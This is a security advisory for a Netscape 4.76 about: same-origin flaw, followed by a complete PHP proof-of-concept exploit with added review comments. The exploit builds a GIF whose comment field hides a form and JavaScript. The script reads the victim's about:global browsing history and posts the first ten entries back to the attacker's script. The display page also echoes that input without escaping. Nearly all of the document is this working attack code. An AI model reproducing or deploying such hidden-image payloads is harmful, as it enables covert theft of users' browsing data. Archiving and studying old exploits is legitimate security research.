source: http://www.securityfocus.com/bid/2637/info
Due to a flaw in Navigator's security code, all URLs in the about: protocol are considered to be part of the same domain.
If arbitrary Javascript code is placed in a GIF's comment field, the comment is rendered like a normal HTML page. The Javascript code will run from the image information page in the internal about: 'domain'. This issue has also been reported in JPEG files carrying a comment field.
<?
/*
Netscape 4.76 gif comment flaw
Florian Wesch <fw@dividuum.de>
http://dividuum.de

Proof-of-concept for the about: same-origin flaw described above (BID 2637):
Netscape 4.x treated every about: URL as one origin and rendered the comment
field of a GIF as HTML on the image's about: information page.  This is one
self-contained PHP 4 page driven by a ?mode= parameter; the "evilgif" mode
serves a hand-built GIF whose comment block carries a small form plus script,
and "showhist" prints whatever that form submitted.

NOTE(review), portability:
 - Short open tags (<?) are used throughout; they need short_open_tag=On.
 - $SERVER_NAME, $SERVER_PORT, $PHP_SELF, $mode and $u are never assigned in
   this file; the script relies on the legacy register_globals behaviour that
   exposed server/request data as plain globals.  On any supported PHP these
   are simply undefined.
*/
// Absolute URL of this script; the :port suffix is dropped for port 80.
$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
// The GIF comment below pads "<form action=".$self to exactly 77 columns
// (sprintf "%77s"); "<form action=" is 13 characters, so $self may be at most
// 64 characters or the fixed-offset comment layout no longer fits.
if (strlen($self)>64) {
echo "Url of $self is too long. 64 maximum.<br>";
echo "You can change this but I think 64 should be enough for anybody ;-)";
exit;
}
// $mode is the ?mode= query parameter (via register_globals); default is the
// landing page.
if (!isset($mode)) $mode="intro";
// If urllist is submitted
// ($u is the field name of the form embedded in the GIF comment, see the
// "evilgif" case; its presence overrides any ?mode= value.)
if (isset($u)) $mode="showhist";
switch ($mode) {
case "intro":
// Landing page: a single link into the frameset.
?>
<html>
<body>
<a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
</body>
</html>
<?
break;
case "frameset":
// Two frames: "foo" navigates itself to about:global, "bar" loads the GIF
// and then jumps to the GIF's about: image-information page.
?>
<html>
<frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
<frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
<frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
</frameset>
</html>
<?
break;
case "loadhistory":
// replaces the current document with about:global using javascript
// (<base href="about:"> plus action="global" resolves the form target to
// about:global, the browser's history listing; the script auto-submits the
// form so frame "foo" ends up holding that page.)
?>
<html>
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
</html>
<?
break;
case "showimageinfo":
// Loads the GIF once via <img> (presumably so it is cached), then after 5 s
// navigates this frame to about:<gif-url>, the image-information page on
// which the browser renders the GIF comment as HTML.
?>
<html>
<head>
<meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
</head>
<body>
Waiting 5 seconds...<br>
<img src="<? echo $self; ?>?mode=evilgif">
</body>
</html>
<?
break;
case "evilgif":
// Gifs are supposed to be compressed. The program I
// used sucks :-)
// The image is assembled as a hex string and converted to bytes at the end.
// Read from the hex, the layout appears to be: "GIF89a" signature
// (474946383961), a 10x10 logical screen (0a00 0a00), packed byte f7 with a
// 256-entry global colour table, a comment extension (21 fe ff: comment
// label, first sub-block of 255 bytes) holding the HTML/JS payload, zero
// padding, an image descriptor (2c ...) with a tiny coded image, and the
// trailer 3b.
header("Content-type: image/gif");
$gif ="4749463839610a000a00f70000ffffffffffccffff";
$gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
$gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
$gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
$gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
$gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="ffffffffffffffffffffffff0000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000000021feff";
// Comment data: "<form action=".$self is left-padded to 77 characters so the
// rest of the payload lands at fixed offsets, followed by the form + script.
$gif.=bin2hex(sprintf("%77s%s",
/*"<form action=".$self,' target=_parent name=s method=get >'.*/
/* I'm using POST so the submitted urls do not appear in the logfile */
"<form action=".$self,' target=_parent name=s method=post>'.
'<input name=u>'.
'</form>'.
'<script>'.
/* frame "foo" holds about:global at this point (see "loadhistory") */
'f=parent.frames["foo"].document;'.
'l="";'.
/*'for(i=0;i<f.links.length;i++)'.*/
/* only the first 10 links are collected, joined with "|" */
'for(i=0;i<10 ;i++)'.
'l+=f.links[i]+"|";'.
'document.s.u.value=l;'.
/* NOTE(review): the 0xFF byte spliced into "document.s.submit()" is
   presumably where the next GIF comment sub-block length byte has to sit
   (a comment sub-block holds at most 255 bytes); verify against the
   offsets before relying on it. */
'document.'.chr(255).'s.submit();'.
'</script>'));
$gif.= "00000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000002c000000000a000a00000813004708";
$gif.="1c48b0a0c18308132a5cc8b061c28000003b";
// Hex -> raw bytes ("H" + digit count) sent as the image body.
echo pack("H".strlen($gif), $gif);
break;
case "showhist":
// $u arrives from the form inside the GIF comment as a "|"-joined list.
// NOTE(review): $u is request-controlled and is echoed straight into an href
// and the page body without htmlspecialchars(); as written, this page
// reflects whatever the client submits.
$urls=explode("|",$u);
echo "<h1>Top 10 urls in about:global</h1>";
foreach ($urls as $url) {
echo "<a href=$url>$url</a><br>";
}
}; // the ';' after the switch is an empty statement, harmless
?>